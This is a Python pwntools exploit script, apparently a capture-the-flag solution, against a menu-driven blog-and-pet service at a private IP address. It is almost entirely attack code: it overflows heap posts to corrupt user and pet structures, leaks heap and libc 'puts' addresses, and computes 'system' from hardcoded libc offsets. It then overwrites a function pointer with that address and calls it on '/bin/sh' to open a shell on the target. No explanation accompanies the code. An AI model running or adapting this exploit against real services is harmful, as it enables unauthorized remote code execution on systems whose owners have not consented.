1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112
| from pwn import * context(log_level = "debug", terminal = ["deepin-terminal", "-x", "sh", "-c"]) t = remote('192.168.5.178', 9999)
def register(username, password): t.sendlineafter('>>\n', '1') t.sendlineafter('Username >>\n', str(username)) t.sendlineafter('Password >>\n', str(password))
def login(username,password): t.sendlineafter('>>\n', '2') t.sendlineafter('Username >>\n', str(username)) t.sendlineafter('Password >>\n', str(password))
def post(title,length,context): t.sendlineafter('>>\n','1') t.sendlineafter('Title >>\n',str(title)) t.sendlineafter('Content Length >>\n', str(length)) t.sendlineafter('Content >>\n', context)
def edit(id,title,size,context): t.sendlineafter('>>\n', '3') t.sendlineafter('Post id >>\n', str(id)) t.sendlineafter('New title >>\n', str(title)) t.sendlineafter('New content size >>\n', str(size)) t.sendlineafter('New Content >>\n',context)
def logout(): t.sendlineafter('>>\n', '0')
def rename(context): t.sendlineafter('>>\n', '6') t.sendlineafter('pet >>',context)
def adopt(name): t.sendlineafter('>>\n', '5') t.sendlineafter('pet >>',name)
def abandon(): t.sendlineafter('>>\n', '7')
raw_input() userdb = 0x603158 register('a','a') login('a','a') post('a0',0x230,cyclic(520) + p64(userdb - 0x10)) edit('2','f',0x240,'cccc') logout() register('b','b') login('b','b') t.recvuntil('Type: ') heap = u64(t.recv(4).ljust(8,'\x00')) - 0x230 log.info('heap_addr: '+ hex(heap)) fake_pet = heap + 0x940 post('a1',0x90,p64(0x603038) * 3) post('a2',0x230,cyclic(520) + p64(fake_pet)) edit('5','d',0x240,'dddd') logout() register('c','c') login('c','c') t.recvuntil('Type: ') addr_puts = u64(t.recv(6).ljust(8,'\x00')) log.info('addr_puts: ' + hex(addr_puts)) magic = 0x603164 logout() login('b','b') edit('4','f',0x90,p64(magic) * 3) logout() login('c','c') t.recvuntil('Pet Name: ') magic = u64(t.recv(4).ljust(8,'\x00')) log.info('magic: ' + hex(magic)) offset_puts = 0x6f5d0 offset_sys = 0x45380 addr_sys = addr_puts - offset_puts + offset_sys log.info('addr_sys: ' + hex(addr_sys)) post('a3',0x230,cyclic(520) + p64(fake_pet)) edit('7','d',0x240,'dddd') logout() register('d','d') login('b','b') fake_magic = magic + 0x600000000 edit('4','f',0x90,p64(fake_magic) + p64(0x603018)) logout() login('d','d') rename(p64(addr_sys)) logout() register('e','e') login('e','e') adopt('/bin/sh\x00') abandon()
t.interactive()
|